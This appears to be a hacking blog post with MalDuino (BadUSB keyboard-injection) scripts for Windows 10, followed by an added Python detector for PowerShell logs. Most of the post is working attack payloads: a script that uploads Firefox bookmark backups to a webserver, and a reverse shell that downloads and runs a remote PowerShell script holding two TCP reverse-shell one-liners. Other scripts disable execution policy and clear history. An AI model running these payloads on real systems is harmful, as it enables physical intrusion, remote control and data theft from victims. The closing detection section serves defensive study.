
MalDuino

 January 27, 2022    Hacking

MalDuino is a microcontroller that emulates a keyboard to inject commands. It is an Arduino-powered alternative to the original USB Rubber Ducky from Hak5.


Change desktop background image (Windows 10)


DELAY 100000
GUI r
DELAY 1000
STRING powershell.exe
ENTER
DELAY 1000
STRING Set-ExecutionPolicy -Scope CurrentUser Unrestricted
ENTER 
DELAY 1000
STRING $url = "<wallpaper url>"
ENTER 
DELAY 1000
STRING cd ~
ENTER 
DELAY 1000
STRING cd Desktop
ENTER 
DELAY 1000
STRING $wc = New-Object System.Net.WebClient
ENTER 
DELAY 1000
STRING $currentPicture = "$(Pwd)\bg.jpg"
ENTER 
DELAY 1000
STRING $wc.DownloadFile($url, $currentPicture)
ENTER 
DELAY 1000
STRING set-itemproperty -path "HKCU:Control Panel\Desktop" -name WallPaper "$currentPicture"
ENTER 
DELAY 1000
STRING RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters ,1 ,True
ENTER 
DELAY 1000
STRING Clear-History
ENTER 
DELAY 1000
STRING exit
ENTER 


Keep device awake 1 hour


DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI
DELAY 60000
GUI


Send Firefox bookmarks to a webserver (Windows 10)


DELAY 100000
GUI r
DELAY 1000
STRING powershell.exe
ENTER
DELAY 1000
STRING Set-ExecutionPolicy -Scope CurrentUser Unrestricted
ENTER 
DELAY 1000
STRING $app = $env:APPDATA
ENTER
DELAY 1000
STRING $uri=<webserver>
ENTER
DELAY 1000
STRING $dir = $app + "\Mozilla\Firefox\Profiles\*.dev-edition-default\bookmarkbackups"
ENTER
DELAY 1000
STRING Set-Location $dir
ENTER
DELAY 1000
STRING $latest = Get-ChildItem | Sort-Object LastAccessTime -Descending | Select-Object -First 1
ENTER
DELAY 1000
STRING Invoke-RestMethod -Uri $uri -Method Post -InFile $latest.FullName 


Reverse Shell (Windows 10)


DELAY 1000
GUI r
DELAY 100
STRING powershell "IEX (New-Object Net.WebClient).DownloadString('https://<webserver>/ServerScript.ps1');"
ENTER

ServerScript.ps1

#From https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#powershell 
#Shell nc64.exe -l -p 4242

$client = New-Object System.Net.Sockets.TCPClient('<ip>',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

$sm=(New-Object Net.Sockets.TCPClient('<ip>',4242)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}
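
Detection side, as an added example that is not part of the original post or the MalDuino project: the scripts above type one PowerShell statement per line, so with script block logging enabled (event ID 4104) each statement is recorded as its own block and the useful signal only appears when blocks are correlated per session. The `(host, pid, text)` event layout, the rule names and the sample events are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Per-block rules built from the scripts on this page; every regex in a rule
# must match the same logged script block (case-insensitive).
RULES = {
    "execution-policy-unrestricted": [r"Set-ExecutionPolicy\b.*\bUnrestricted\b"],
    "download-cradle": [r"\b(IEX|Invoke-Expression)\b", r"\.DownloadString\s*\("],
    "tcpclient-command-loop": [r"Net\.Sockets\.TCPClient", r"\biex\b", r"\.Read\s*\("],
    "firefox-bookmark-path": [r"\\Mozilla\\Firefox\\Profiles\\.*bookmarkbackups"],
    "file-upload-post": [r"Invoke-RestMethod\b", r"-Method\s+Post\b", r"-InFile\b"],
    "history-cleared": [r"\bClear-History\b"],
}
ALERT_ALONE = {"download-cradle", "tcpclient-command-loop"}
# Typed scripts log one statement per block, so some findings only exist
# when several rules hit within the same PowerShell session.
COMBOS = {"bookmark-exfiltration": {"firefox-bookmark-path", "file-upload-post"}}
CONTEXT = {"execution-policy-unrestricted", "history-cleared"}  # noisy alone

def match_block(text):
    """Return the names of all per-block rules matching one script block."""
    return {name for name, pats in RULES.items()
            if all(re.search(p, text, re.IGNORECASE) for p in pats)}

def scan(events):
    """events: iterable of (host, pid, script_block_text).
    Returns {(host, pid): sorted finding names} for sessions that alert."""
    hits = defaultdict(set)
    for host, pid, text in events:
        hits[(host, pid)] |= match_block(text)
    alerts = {}
    for session, names in hits.items():
        found = names & ALERT_ALONE
        found |= {combo for combo, need in COMBOS.items() if need <= names}
        if found:  # attach context rules only to sessions that already alert
            alerts[session] = sorted(found | (names & CONTEXT))
    return alerts

# Constructed sample events, not real logs; hosts, PIDs and URL are made up.
SAMPLE = [
    ("ws-01", 4120, "Set-ExecutionPolicy -Scope CurrentUser Unrestricted"),
    ("ws-01", 4120, '$dir = $app + "\\Mozilla\\Firefox\\Profiles\\*.dev-edition-default\\bookmarkbackups"'),
    ("ws-01", 4120, "Invoke-RestMethod -Uri $uri -Method Post -InFile $latest.FullName"),
    ("ws-02", 7788, "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/a.ps1');"),
    ("ws-03", 991, "Set-ExecutionPolicy -Scope CurrentUser Unrestricted"),
    ("ws-03", 991, "Get-ChildItem | Sort-Object LastAccessTime"),
]

if __name__ == "__main__":
    for session, findings in scan(SAMPLE).items():
        print(session, findings)
```

The execution-policy and history rules are kept as context only, since administrators run both legitimately; `ws-03` in the sample shows a session that hits one of them and stays silent.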